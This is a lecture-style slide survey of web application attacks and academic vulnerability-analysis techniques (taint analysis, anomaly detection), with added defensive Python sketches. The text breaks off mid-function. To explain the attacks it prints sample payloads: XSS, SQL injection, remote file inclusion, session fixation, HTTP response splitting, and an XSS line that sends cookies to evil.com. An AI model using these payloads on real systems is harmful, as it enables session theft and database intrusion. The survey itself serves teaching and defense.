Vulnerability Analysis of Web-based Applications
Yi Tang
Email: tangyi@ymail.com
Dec. 18, 2008

Outline
1. Current web security trend
2. Web technologies
3. Web-based attacks
4. Vulnerability analysis
5. Conclusion

Web security
• As the use of web applications for critical services has increased, attacks against the web have grown as well.
• A series of characteristics makes web applications a valuable target for an attacker:
  – Web applications are often designed to be widely accessible.
  – Web applications often interface with back-end components containing sensitive data.
  – The most popular web languages are currently easy enough to allow novices to start writing their own applications.

Trend
• In the first semester of 2005, Symantec cataloged 1,100 new vulnerabilities affecting web-based applications, which represents well over half of all new vulnerabilities.
• A newer statistic comes from the white paper of the Symantec threat report.

Common Gateway Interface
• One of the first mechanisms that enabled dynamic content was the Common Gateway Interface (CGI).
• It defines a mechanism that a server can use to interact with external applications.
• Disadvantage: a new process has to be created and executed for each request.
• Server-specific APIs:
  – Low initialization cost; they can perform more general functions than CGI-based programs.
  – Writing a program is more complex, because it requires some knowledge of the server's inner workings.

[Figure: labels mention users to authenticate, and the tasks of parameter decoding and session management]

Embedded Web Application Frameworks
• Today, most web applications are implemented in a middle way between the original CGI and server-specific APIs.
• An interpreter or compiler is used to encode the application's components, together with rules that govern the interaction between the server and those components.
• Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python (interpreted, object-oriented, loosely typed).

A sample PHP program
• Parameters of requests sent through the HTTP GET method are available in the $_GET array.
• User input is first checked using the validate function.
• Native support for sessions makes it easy to keep track of different requests.

Attacks
• Web-based applications have fallen prey to a variety of attacks that violate different security properties.
• This survey focuses on attacks that make an application behave in unforeseen ways, to disclose sensitive information or execute commands on behalf of the attacker.
• Currently, most attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation.

Interpreter Injection
• Many dynamic languages include functions to dynamically compose and interpret code:
  – include and require: include and evaluate a file as PHP code.
  – eval, preg_replace (with the /e modifier): evaluate a string as PHP code.
  – exec, passthru, system, popen, shell_exec, pcntl_exec, proc_open, and the backtick operator: execute their input as a shell command.
• The attack targets the server.

Sample of interpreter injection in Double Choco Latte
• The server does not fully filter the menuAction parameter of the URL.

Filename Injection
• Most web languages allow files to be included dynamically, either to interpret their content or to present them to users.
• E.g., to generate different page content depending on the user's preferences, such as for internationalization purposes.
• Because PHP allows the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker's control.

A filename injection vulnerability in txtForum
• In txtForum, pages are divided into parts (e.g., header, footer, forum view) and can be customized by using different "skins," which are different combinations of colors, fonts, and other presentation parameters.
• A skin parameter with the value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl
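
One common defense against this kind of inclusion is to map the request parameter onto a fixed allowlist instead of using it to build a path. The sketch below assumes hypothetical skin names and a hypothetical `skins/` directory layout; it is not txtForum's code.

```python
# Hypothetical set of skins shipped with the application.
ALLOWED_SKINS = {"default", "dark"}

def header_template_path(skin: str) -> str:
    """Return the local header template for a skin name from the request."""
    # Anything outside the allowlist (URLs, "../" paths, unknown names)
    # falls back to the default skin instead of reaching the include.
    if skin not in ALLOWED_SKINS:
        skin = "default"
    return "skins/" + skin + "/header.tpl"

print(header_template_path("dark"))
print(header_template_path("http://[attacker-site]"))
```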

Cross-site Scripting (XSS)
• In this attack, an attacker forces a client, typically a web browser, to execute attacker-supplied code, typically JavaScript, which runs in the context of a trusted web site.
• Sample: http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
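
A minimal sketch of the usual countermeasure, output escaping, using Python's standard `html.escape`. The `render_welcome` function is a hypothetical stand-in for welcome.cgi, not code from the slides.

```python
import html

def render_welcome(name: str) -> str:
    """Build the welcome page, escaping the untrusted `name` parameter."""
    # html.escape replaces <, >, & and quotes with HTML entities, so the
    # browser shows the value as text instead of running it as script.
    return "<html><body>Welcome, " + html.escape(name) + "</body></html>"

page = render_welcome("<script>alert(document.cookie)</script>")
print(page)
```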

Impact of XSS Attacks
• Access to authentication credentials for the web application
  – Cookies, username and password
  – XSS is not a harmless flaw!
• Normal users
  – Access to personal data (credit card, bank account)
  – Access to business data (bid details, construction details)
  – Misuse of the account (ordering expensive goods)
• High-privileged users
  – Control over the web application
  – Control of or access to the web server machine
  – Control of or access to back-end and database systems

SQL Injection
• A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.
• This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application.

    $activate = $_GET["activate"];
    $result = dbquery("SELECT * FROM new_users " . "WHERE user_code = '$activate'");

• If the activate parameter is set to the string ' OR 1=1 -- the query returns the content of the entire new_users table:

    SELECT * FROM new_users WHERE user_code = '' OR 1=1 --'
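
The same effect can be reproduced with Python's standard `sqlite3` module. This is a sketch under assumptions: the table contents are invented for illustration, and the parameterized query stands in for whatever fix the vulnerable application would need.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE new_users (user_code TEXT, name TEXT)")
conn.executemany("INSERT INTO new_users VALUES (?, ?)",
                 [("c1", "alice"), ("c2", "bob")])  # invented sample rows

activate = "' OR 1=1 --"  # attacker-controlled value

# Vulnerable: the input is pasted into the query text and parsed as SQL.
unsafe = conn.execute(
    "SELECT * FROM new_users WHERE user_code = '" + activate + "'").fetchall()

# Safer: the input is bound as a parameter and never parsed as SQL.
safe = conn.execute(
    "SELECT * FROM new_users WHERE user_code = ?", (activate,)).fetchall()

print(len(unsafe), len(safe))
```

The concatenated query returns every row, while the parameterized one returns none, because no user_code equals the literal attack string.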

Session Hijacking
• HTTP is a stateless protocol: it has no built-in mechanism that allows an application to maintain state throughout a session.
• The session state can be maintained in different ways:
  – It can be encoded in a document transmitted to the user, such as a cookie or HTML hidden form fields, and sent back as part of later requests.
    Problem: the cookie or hidden fields may be changed by dishonest users.
  – Each user is assigned a unique session ID.
    Problem: session fixation.

Session Hijacking
• Session fixation: the attacker sets a user's session ID to one known to the attacker, for example by sending the user an email with a link that contains a particular session ID:
  http://[target]/login.php?sessionid=1234
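
A common mitigation is to issue a fresh session ID at login, so that an ID planted by the attacker never becomes an authenticated one. The sketch below assumes a hypothetical in-memory `sessions` store and `login` function.

```python
import secrets

sessions = {}  # hypothetical store: session id -> session data

def login(presented_sid: str, user: str) -> str:
    """Authenticate `user` and return a fresh session id."""
    # Drop whatever id the client presented (it may have been planted by
    # an attacker) and issue a new, unpredictable one.
    sessions.pop(presented_sid, None)
    new_sid = secrets.token_urlsafe(32)
    sessions[new_sid] = {"user": user}
    return new_sid

sid = login("1234", "alice")
print(sid != "1234", "1234" in sessions)
```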

Response Splitting
• The attacker is able to set the value of an HTTP header field so that the resulting response stream is interpreted by the attack target as two responses.
• To perform response splitting, the attacker must be able to inject data containing the header termination characters and the beginning of a second header.
• This is usually possible when user data is used unsanitized to determine the value of an HTTP header.

Response Splitting
    <% response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang")); %>
• With lang=en_US, the response contains the header:
    Location: http://vulnerable.com/by_lang.jsp?lang=en_US
• However, if lang is set to the following value, the response stream is read as two responses:
    dummy%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>New document</html>
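
A minimal sketch of the corresponding check: refuse any header value that contains CR or LF after URL decoding. The `redirect_header` function is hypothetical and only mirrors the redirect in the JSP fragment.

```python
from urllib.parse import unquote

def redirect_header(lang: str) -> str:
    """Return the Location header for the language redirect."""
    # CR and LF terminate a header line, so a value containing them
    # could start a second, attacker-controlled response.
    if "\r" in lang or "\n" in lang:
        raise ValueError("illegal character in header value")
    return "Location: http://vulnerable.com/by_lang.jsp?lang=" + lang

print(redirect_header("en_US"))

payload = unquote("dummy%0d%0aContent-Length:%200")
try:
    redirect_header(payload)
    rejected = False
except ValueError:
    rejected = True
print(rejected)
```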

Response Splitting
• Response splitting is often related to web cache poisoning.
• Two conditions:
  – A caching proxy server interprets the response stream as containing two documents.
  – The proxy associates the second document with the original request.
• An attacker would then be able to insert into the proxy's cache a page of his choice, associated with a URL in the vulnerable application.

Vulnerability analysis
• Vulnerability analysis refers to the process of assessing the security of an application by auditing either the application's code or its behavior for possible security problems.
• The identification of vulnerabilities in web applications can follow one of two orthogonal detection approaches: the negative (vulnerability-based) approach and the positive (behavior-based) approach.

Detection approach
• Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications, to identify instances of the modeled vulnerabilities.
• Positive approach: builds models of the normal behavior of an application (e.g., using machine-learning techniques) and then analyzes the application's behavior to identify any abnormality that might be caused by a security violation.
• Two fundamental techniques can be used to do the analysis: static analysis and dynamic analysis.

• Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. It does not require the application to be deployed and executed.
• Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run time. It is less prone to false positives, since the analysis is done at run time.
• In practice, hybrid approaches that mix static and dynamic techniques are frequently used, to combine the strengths and minimize the limitations of the two approaches.

Outline
1. Current web security trend
2. Web technologies
3. Web-based attacks
4. Vulnerability analysis
   1. Negative approach
   2. Positive approach
5. Conclusion

Negative approach: taint propagation
• Most negative approaches assume that vulnerabilities are the result of insecure data flow in applications.
• They attempt to identify when untrusted user input propagates to security-critical functions (sinks) without being properly checked and sanitized.
• Taint propagation: data from input is marked as tainted, and its propagation throughout the program is traced to check whether it can reach sinks.
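
The idea can be sketched in a few lines with a string subclass that carries the taint mark through concatenation. The names `Tainted`, `sanitize`, and `sink` are hypothetical, and the quote-doubling sanitizer is only an illustration, not a recommended defense.

```python
class Tainted(str):
    """A string that originates from untrusted input."""
    def __add__(self, other):
        return Tainted(str(self) + str(other))
    def __radd__(self, other):
        return Tainted(str(other) + str(self))

def sanitize(value) -> str:
    # Illustrative sanitizer: doubles single quotes and returns a plain str,
    # which removes the taint mark.
    return str(value).replace("'", "''")

def sink(query: str) -> str:
    # Security-critical function: refuses tainted arguments.
    if isinstance(query, Tainted):
        raise ValueError("tainted data reached a sink")
    return "executed: " + query

user = Tainted("' OR 1=1 --")
query = "SELECT * FROM t WHERE c = '" + user + "'"
print(isinstance(query, Tainted))
print(sink("SELECT * FROM t WHERE c = '" + sanitize(user) + "'"))
```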

Negative static approaches
• Static analysis can be applied before deployment; it does not require modification of the deployment environment.
• Current work focuses on the analysis of applications written in PHP and Java.
• It may require the source code of the web site.

WebSSARI (WWW '04)
• WebSSARI is one of the first works to apply taint propagation analysis to web security.
• WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.
• The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate.
  – Typestate: PHP is extended with two types, tainted and untainted, and the tool keeps track of the typestate of variables.
  – To untaint tainted data, the data has to be processed by a sanitization routine or cast to a safe type.

• It relies on three predefined files:
  – a file with preconditions for all sensitive functions (the sinks)
  – a file listing known sanitization functions, used to untaint data
  – a file specifying all possible sources of untrusted input
• When the tool finds that tainted data reaches a sink, it automatically inserts sanitization routines.

Typestate
    if (A) { A = X; } else { if (B) { A = Y; } else { A = Z; } }
    echo(A);
    if (C) {
• At every program point, the algorithm keeps a static invariant representing the most dangerous possible state at that point.
• At the merge point before echo(A): T = LUB(T, U, T)
[Figure: control flow graph of the code, with the typestate (T = tainted, U = untainted) of A, X, Y, and Z annotated at each node]
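
The merge step can be sketched as a least upper bound on a two-point lattice. The branch states below are an assumption chosen to match T = LUB(T, U, T): A is taken to be tainted after A=X and A=Z, and untainted after A=Y.

```python
UNTAINTED, TAINTED = 0, 1  # two-point lattice with UNTAINTED < TAINTED

def lub(*states: int) -> int:
    """Least upper bound: tainted if any incoming state is tainted."""
    return max(states)

# Assumed typestate of A at the end of each branch.
after_x, after_y, after_z = TAINTED, UNTAINTED, TAINTED

# At the merge point before echo(A), keep the most dangerous state.
state_at_echo = lub(after_x, after_y, after_z)
print("tainted" if state_at_echo == TAINTED else "untainted")
```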

Typestate
    if (A) { A = X; } else { if (B) { A = Y; } else { A = Z; } }
    echo(A);
    if (C) {
• Typestate offers a balance between precision and cost
• Maintains a typestate for every diverging path
  – Increases precision
  – Induces memory cost
• Merges typestate at execution merge points
  – Limits memory cost
  – Induces imprecision
  – Denies counterexample support
• WebSSARI incorporates flow-sensitive typing based on typestate
[Figure: control flow graph of the code, shown with and without merging at echo(A)]

Runtime Protection
• Sanitization routines are automatically inserted just before vulnerable function calls.
• Depending on the vulnerable function, one of the following three routines is inserted:
  – HTML output sanitization
  – Database command sanitization
  – System command sanitization

System Implementation
[Figure not recoverable]

Problems of WebSSARI
• It uses an intra-procedural algorithm and thus does not model information flow across function boundaries. (Xie, USENIX '06)
• All dynamic variables and arrays are considered tainted, which reduces the accuracy of the analysis.
• It cannot accurately track arrays, aliases, and object-oriented code. (Pixy, Oakland '06)

Summary
• Static analysis depends heavily on language-specific parsers. This is generally not a problem for general-purpose languages.
• Web applications use dynamic scripting languages that make it easy to use complex data structures, such as arrays and hashes, which are hard to track.
• One main drawback of static analysis is its susceptibility to false positives, caused by inevitable analysis imprecision.
• Precise evaluation of sanitization routines is more difficult; regular expressions alone may not be enough.

Dynamic negative approach
• Dynamic negative techniques are also based on taint analysis: untrusted sources, sensitive sinks, and taint propagation still need to be modeled.
• Instead of running the analysis on source code, the program or the interpreter is extended to collect the information, and tainted data is tracked during execution.
• Perl's taint mode: when the Perl interpreter is invoked with the -T option, it makes sure that no data obtained from the outside environment can be used in security-critical functions (too conservative).

“Automatically Hardening Web Applications Using Precise Tainting”, SEC '05
• Proposes a modification of the PHP interpreter to dynamically track tainted data in PHP programs.
  – Fully automated
  – Aware of application semantics
• Replaces the PHP interpreter with a modified interpreter that:
  – Keeps track of which information comes from untrusted sources (precise tainting)
  – Checks how untrusted input is used

[Figure: request flow, labeled as steps 1 to 8, through the Client, the HTTP Server on the Web Server, the File System (file.php), the PHP Interpreter with PHPrevent, the Database, and the System APIs]

Coarse-grain Tainting
• Provided by many scripting languages (Perl, Ruby)
• Untrusted input is tainted
• Everything touched by tainted data becomes tainted

    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";

• The entire $query string is tainted

Precise Tainting
• Untrusted input is tainted
• Taint markings are maintained at character level
  – Depends on semantics of program
• Only really tainted data is tainted

    $query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";
    $query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''";

• In the second query, only the characters that came from user input (' OR 1 = 1; -- ';) are tainted.
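
Character-level marking can be sketched by carrying one boolean per character through concatenation. The `concat` helper and its (text, is_tainted) input format are assumptions made for illustration; the real system tracks this inside the modified PHP interpreter.

```python
def concat(*parts):
    """Concatenate (text, is_tainted) parts.

    Returns the joined text and a list with one taint mark per character.
    """
    text, marks = "", []
    for s, tainted in parts:
        text += s
        marks += [tainted] * len(s)
    return text, marks

user = "' OR 1 = 1; -- ';"   # attacker-supplied
pwd = ""                     # attacker-supplied (empty)

query, marks = concat(
    ("SELECT real_name FROM users WHERE user = '", False),
    (user, True),
    ("' AND pwd = '", False),
    (pwd, True),
    ("'", False),
)
tainted_text = "".join(c for c, t in zip(query, marks) if t)
print(query)
print(tainted_text)
```

Only the characters contributed by `user` carry the mark; the SQL text written by the programmer stays untainted.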

Precise Checking
• Wrappers around PHP functions handle updating and checking the precise taint information.
• Conservative: no false negatives, while minimizing false positives.
  – Behavior only changes when an attack is likely.

Preventing SQL Injection
• Parse the query using the SQL parser to identify interpreted text.
• Disallow SQL keywords or delimiters in interpreted text that is tainted:
  – The query is not sent to the database.
  – An error response is returned.

    "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''";
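
A rough sketch of such a check, with a hand-written scanner standing in for the SQL parser. Everything here is an assumption: the keyword subset, the treatment of quotes, and the `build` helper. A real implementation would rely on an actual SQL grammar.

```python
KEYWORDS = {"OR", "AND", "UNION", "SELECT", "DROP"}  # illustrative subset

def build(*parts):
    """Join (text, is_tainted) parts into a query and per-character marks."""
    text = "".join(s for s, _ in parts)
    marks = [t for s, t in parts for _ in s]
    return text, marks

def is_attack(query, marks):
    """True if a tainted keyword or delimiter occurs in interpreted text."""
    in_string, word, word_tainted = False, "", False
    for ch, tainted in zip(query + " ", marks + [False]):
        if not in_string and ch.isalpha():
            word += ch
            word_tainted = word_tainted or tainted
            continue
        # Any other character ends the pending word.
        if word_tainted and word.upper() in KEYWORDS:
            return True              # tainted keyword
        word, word_tainted = "", False
        if ch == "'":
            if tainted:
                return True          # tainted string delimiter
            in_string = not in_string
        elif not in_string and tainted and ch in ";-":
            return True              # tainted statement or comment delimiter
    return False

def login_query(user):
    return build(("SELECT real_name FROM users WHERE user = '", False),
                 (user, True), ("' AND pwd = ''", False))

print(is_attack(*login_query("' OR 1 = 1; -- ';")))
print(is_attack(*login_query("alice")))
```

Text inside an untainted pair of quotes is treated as data, so a user who is literally named "or" does not trigger the check.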

Preventing PHP Injection
• Disallow tainted data from being used in functions that treat input strings as PHP code or manipulate system state.
  – Wrappers are placed around these functions to enforce this rule.
  – A phpBB attack is prevented by wrappers around preg_replace.

Preventing Cross-Site Scripting
• Wrappers around output functions
  – Buffer the output, then parse the tainted output with HTML Tidy.
• The defense takes advantage of precise tainting information to identify web page output generated from untrusted sources.
  – Dangerous content is determined by examining the HTML grammar.
  – It is sanitized by removing tags.
• Safe: <b>Hello</b>
• Unsafe: <b onmouseover='location.href="http://evil.com/steal.php?" + document.cookie'>Hello</b>

Summary of dynamic negative method
• A modified interpreter can be applied to all web applications; all the required information is available as a result of execution.
• Further, no complex analysis of features such as aliasing is required.
• However, it gives no guarantee of covering all cases.

Summary of negative method
• If taint propagation is done statically, the precision depends heavily on the ability to deal with the complexities of dynamic features. Precise evaluation of sanitization routines is especially important.
• If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability, and performance arise.

Positive Approaches
• Based on deriving models of the “normal” behavior
• Assumptions:
  – Deviations mean attacks or vulnerabilities.
  – Attacks create an anomalous manifestation.
• An anomaly detection system uses a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a web-based application.

Anomaly-based
• Based on the assumption that normal traffic can be defined
• Attack patterns will differ from such ‘normal’ traffic
• This difference should be expressible quantitatively
• An anomaly-based detection system goes through a learning phase to register such ‘normal’ traffic
• Analysis is done for individual field attributes as well as for the entire query string

Anomaly Detection of Web-based Attacks
Christopher Kruegel & Giovanni Vigna, CCS '03
• It is hard to keep intrusion detection signature sets updated with respect to the large number of vulnerabilities discovered daily.
• This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications.
• The anomaly detection system takes as input web server log files that conform to the Common Log Format and produces an anomaly score for each web request.

Data Model
• Only GET requests, with no headers:
    169.229.60.105 - johndoe [6/Nov/2002:23:59 -0800] "GET /scripts/access.pl?user=johndoe&cred=admin" 200 2122
• Only the query string is analyzed, not the path:
  – Path: /scripts/access.pl
  – Query: user=johndoe&cred=admin, i.e. a1=v1 and a2=v2
• For query q, Sq = {a1, a2}

Detection model
• Each model m is associated with a weight wm.
• Each model returns a probability pm. A value of pm close to 0 indicates an anomalous event, i.e. a value of 1 − pm close to 1 indicates an anomalous event.
• If the weighted score is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.
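
The slide does not show the scoring formula. A plausible reading, taken here as an assumption, is the weighted sum of (1 − pm) over all models, which the following sketch computes; the function names and the sample threshold are invented.

```python
def anomaly_score(results):
    """results: list of (weight w_m, probability p_m) pairs, one per model.

    Assumed form: sum over all models of w_m * (1 - p_m).
    """
    return sum(w * (1.0 - p) for w, p in results)

def is_anomalous(results, threshold):
    """Raise an alert when the weighted score exceeds the threshold."""
    return anomaly_score(results) > threshold

normal = [(1.0, 0.9), (1.0, 1.0), (1.0, 0.8)]
attack = [(1.0, 0.9), (1.0, 0.0), (1.0, 0.01)]
print(anomaly_score(normal), anomaly_score(attack))
print(is_anomalous(normal, 1.0), is_anomalous(attack, 1.0))
```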

Anomaly-based
• Some of the attributes that could be analyzed are:
  – Input length
  – Character distribution
  – Parameter string structure
  – Parameter absence or presence
  – Order of parameters

Attribute Length
• Normal parameters
  – Fixed-size tokens (session identifiers)
  – Short strings (input from HTML forms)
  – So the length does not vary much between requests associated with a certain program
• Malicious activity
  – E.g., a buffer overflow, whose payload makes the parameter much longer
• Goal: to approximate the actual but unknown distribution of the parameter lengths and detect deviations from the normal

Learning & Detection
• Learning
  – Calculate the mean and variance of the lengths l1, l2, ..., ln of the parameters processed, over the n queries with this attribute.
• Detection
  – Uses the Chebyshev inequality.
  – The bound it computes is very weak, which results in a high degree of tolerance.
  – Only obvious outliers are flagged as suspicious.
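
A sketch of the length model, assuming the Chebyshev bound is used in the form p(l) = variance / (l − mean)², capped at 1. Returning 1 for lengths at or below the mean is a further assumption of this sketch, as are the function names.

```python
from statistics import fmean, pvariance

def learn(lengths):
    """Learning phase: mean and variance of the observed lengths."""
    return fmean(lengths), pvariance(lengths)

def length_probability(l, mean, var):
    """Chebyshev-style upper bound on seeing a deviation as large as l."""
    if l <= mean:
        return 1.0          # assumption: short values are never flagged
    return min(1.0, var / (l - mean) ** 2)

mean, var = learn([8, 10, 12])
print(length_probability(11, mean, var))    # close to the mean
print(length_probability(300, mean, var))   # e.g. an overflow payload
```

Because the bound is weak, a value only slightly longer than usual still gets probability 1; only extreme lengths score near 0.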

Attribute character distribution
• Attributes have a regular structure and mostly contain printable characters.
  – There are similarities between the character frequencies of query parameters.
  – The relative character frequencies of the attribute are sorted in descending order.
• Example: "passwd" consists of the characters 112 97 115 119 100, with 115 occurring twice. The sorted relative frequencies are 0.33, then 0.17 four times, then 0 for the remaining 251 values: ICD(0) = 0.33, ICD(1) to ICD(4) = 0.17, ICD(5) = 0.
• Normal: frequencies slowly decrease in value.
• Malicious:
  – Frequencies drop extremely fast (a peak caused by a single character), or
  – nearly not at all (random values).

Why is it useful?
• It cannot be evaded by some well-known attempts to hide malicious code in the string.
  – E.g., NOP operations substituted by instructions with similar behavior (add rA, rA, 0)
• But it is not useful when the attack changes the character distribution of the payload only slightly.

Learning and detection
• Learning
  – For each query attribute, its character distribution is stored.
  – The ICD is obtained by averaging all the stored character distributions.
[Table: example character distributions of three queries q1, q2, q3 and their average; surviving values: q1 = .5 .25 0 0; q2 = .75 .2 .1 0 0; q3 = .25 0; avg = .5 .22 .08 0]

Learning and detection (cont.)
• Detection: Pearson chi-square test
  – It is not necessary to operate on all values of the ICD; consider a small number of intervals, i.e. bins.
  – Calculate observed and expected frequencies:
      Oi = observed frequency for each bin
      Ei = relative frequency of each bin * length of the attribute
  – Compute the chi-square value.
  – Calculate the probability from a predefined chi-square table.
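
The learning and test steps can be sketched as follows. The six bin boundaries are an assumption (the slide only says "a small number of intervals"), the training strings are invented, values are assumed to be non-empty, and the final table lookup that turns the chi-square value into a probability is left out.

```python
from collections import Counter

# Assumed bins over the sorted frequency positions 0..255.
BINS = [(0, 0), (1, 3), (4, 6), (7, 11), (12, 15), (16, 255)]

def sorted_frequencies(value):
    """Relative character frequencies, sorted in descending order."""
    counts = sorted(Counter(value.encode("latin-1", "replace")).values(),
                    reverse=True)
    counts += [0] * (256 - len(counts))
    return [c / len(value) for c in counts]

def learn_icd(samples):
    """ICD: position-wise average of the stored character distributions."""
    dists = [sorted_frequencies(s) for s in samples]
    return [sum(col) / len(dists) for col in zip(*dists)]

def chi_square(icd, value):
    """Pearson chi-square statistic of `value` against the learned ICD."""
    dist = sorted_frequencies(value)
    chi2 = 0.0
    for lo, hi in BINS:
        expected = sum(icd[lo:hi + 1]) * len(value)   # E_i
        observed = sum(dist[lo:hi + 1]) * len(value)  # O_i
        if expected > 0:
            chi2 += (observed - expected) ** 2 / expected
    return chi2

icd = learn_icd(["passwd", "secret", "hunter"])
print(chi_square(icd, "passwd"), chi_square(icd, "aaaaaaaaaaaa"))
```

A value dominated by one repeated character yields a much larger statistic than a value resembling the training data.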

Structural inference
• The structure of a parameter is the regular grammar that describes all of its normal, legitimate values.
• Why?
  – An attacker can craft an attack so that its manifestation appears more regular.
  – For example, non-printable characters can be replaced by groups of printable characters.

Learning and detection
• The basic approach is to generalize the grammar as long as it seems reasonable, and to stop before too much structural information is lost.
• Markov model and Bayesian probability
• NFA
  – Each state S has a set of nS possible output symbols o, which are emitted with probability pS(o).
  – Each transition t is marked with a probability p(t), the likelihood that the transition is taken.

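Learning and detection (cont.)
[Figure: example Markov model with Start and Terminal states; transitions are labeled with probabilities (0.3, 0.7, 0.2, 0.4, 1.0) and states with emission probabilities (a|p(a) = 0.5, b|p(b) = 0.5; a|p(a) = 1; b|p(b) = 1; c|p(c) = 1)]
So, the probability of 'ab' is:
P(w) = (1.0*0.3*0.5*0.2*0.5*0.4) + (1.0*0.7*1.0*1.0)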
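
The word probability is the sum, over all paths from Start to Terminal that emit the word, of the product of transition and emission probabilities. The sketch below uses a topology that is an assumption: it is guessed from the probabilities that survive from the figure and chosen so that the two paths for 'ab' match the two products in the formula. The state names are invented.

```python
# Emission probabilities per state (state names are hypothetical).
EMIT = {
    "ab": {"a": 0.5, "b": 0.5},
    "a": {"a": 1.0},
    "b": {"b": 1.0},
    "c": {"c": 1.0},
}
# Transition probabilities; "end" is the terminal state (assumed topology).
NEXT = {
    "start": {"ab": 0.3, "a": 0.7},
    "ab": {"ab": 0.2, "c": 0.4, "end": 0.4},
    "a": {"b": 1.0},
    "b": {"end": 1.0},
    "c": {"end": 1.0},
}

def word_probability(word, state="start"):
    """Sum over all paths from `state` to the terminal that emit `word`."""
    total = 0.0
    for nxt, p_t in NEXT[state].items():
        if nxt == "end":
            if word == "":
                total += p_t
        elif word:
            p_o = EMIT[nxt].get(word[0], 0.0)
            if p_o > 0.0:
                total += p_t * p_o * word_probability(word[1:], nxt)
    return total

print(word_probability("ab"))
```

Under this topology the two contributing paths give 0.006 and 0.7.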

Learning and detection (cont.)
• The probability of the training data given the model is obtained by adding the probabilities calculated for each input training element.

Learning and detection (cont.)
• The aim is to maximize the product of the model's prior probability and the likelihood of the training data given the model.
  – There is a conflict between simple models, which tend to overgeneralize, and models that fit the data perfectly but are too complex.
  – Simple model: high prior probability, but the likelihood of producing the training data is extremely low, so the product is low.
  – Complex model: low prior probability, but the likelihood of producing the training data is high; the product is still low.
• Model building starts from a model that generates exactly the input data; states are then merged step by step, using the Viterbi algorithm.

Learning and detection (cont.)
• Detection
  – The problem is that even a legitimate input that was regularly seen during the training phase may receive a very small probability value, because the probability values of all possible input words sum to 1.
  – Therefore the model returns 1 if the value is a valid output of the grammar, and 0 if the value cannot be derived from the given grammar.

Token finder
• Determines whether the values of an attribute are drawn from a limited set of possible alternatives (an enumeration).
• When a malicious user tries to pass illegal values to the application, the attack can be detected.

Learning and detection
• Learning
  – Enumeration: the number of different parameter values is bound by some threshold t.
  – Random: the number of different argument instances grows proportionally with the total number of instances.
  – Calculate the statistical correlation.

Learning and detection (cont.)
• Correlation < 0: enumeration; correlation > 0: random
• Detection
  – For an enumeration, the model returns 0 if an unexpected value is seen and 1 otherwise; for a random attribute, it always returns 1.
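
The slide does not say which two series are correlated. The sketch below assumes one plausible construction: f(x) = x counts the values seen so far, and g goes up by one for each new value and down by one for each repeated value. The function name `correlation` and the sample data are invented.

```python
def correlation(values):
    """Correlation between f(x) = x and the up/down counter g (assumed form)."""
    f, g, seen, level = [], [], set(), 0
    for x, v in enumerate(values, start=1):
        level += -1 if v in seen else 1   # up for a new value, down for a repeat
        seen.add(v)
        f.append(x)
        g.append(level)
    n = len(values)
    mf, mg = sum(f) / n, sum(g) / n
    cov = sum((a - mf) * (b - mg) for a, b in zip(f, g))
    var_f = sum((a - mf) ** 2 for a in f)
    var_g = sum((b - mg) ** 2 for b in g)
    return cov / (var_f * var_g) ** 0.5 if var_f and var_g else 0.0

enumerated = ["admin", "guest"] * 10           # few distinct values
random_like = [str(i) for i in range(20)]      # every value is new
print(correlation(enumerated), correlation(random_like))
```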

Attribute presence or absence
• Client-side programs, scripts, or HTML forms preprocess the data and transform it into a suitable request, so legitimate requests are very regular.
• Hand-crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value, and pay little attention to the order.

Learning and detection
• Learning
  – Build a model of acceptable subsets.
  – Record each distinct subset Sq = {ai, ..., ak} of attributes seen during the training phase.
• Detection
  – For each query, the algorithm looks up the current attribute set.
  – If the set was encountered during training, return 1; otherwise return 0.
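
This model amounts to a set lookup. In the sketch below, the attribute names and both function names are invented for illustration.

```python
def learn_subsets(training_queries):
    """Record each distinct set of attribute names seen during training."""
    return {frozenset(q) for q in training_queries}

def presence_score(model, query):
    """Return 1 if this exact attribute set was seen in training, else 0."""
    return 1 if frozenset(query) in model else 0

model = learn_subsets([["user", "cred"], ["user", "cred", "lang"]])
print(presence_score(model, ["cred", "user"]))   # same set, any order
print(presence_score(model, ["user"]))           # missing parameter
```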

Attribute order
• Legitimate invocations of server-side programs often contain the same parameters in the same order.
• Hand-crafted attacks often do not.
• The model tests whether the given order is consistent with the model deduced during the learning phase.

Learning and detection
• Learning:
  – The result is a set O of attribute pairs that encodes the order constraints.
  – Each vertex vi in a directed graph G is associated with the corresponding attribute ai.
  – The ordered attribute list of every query is processed: for each attribute pair (as, at) in this list, with s ≠ t and 1 <= s, t <= i, a directed edge is inserted into the graph from vs to vt.

Learning and detection (cont.)
• Graph G contains all order constraints imposed by the queries in the training data.
• Order is determined by
  – a directed edge
  – a path
• Detection
  – Given a query with attributes a1, a2, ..., ai and a set of order constraints O, all the parameter pairs (aj, ak) with j ≠ k and 1 <= j, k <= i are checked.
  – If there is a violation, return 0; otherwise return 1.
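
A simplified sketch of the order model. It assumes that a constraint (a, b) holds when b is reachable from a in the graph and a is not reachable from b, and that edges run from earlier to later attributes within a query; both points are assumptions, as are the function and attribute names.

```python
from itertools import combinations

def learn_order(training_queries):
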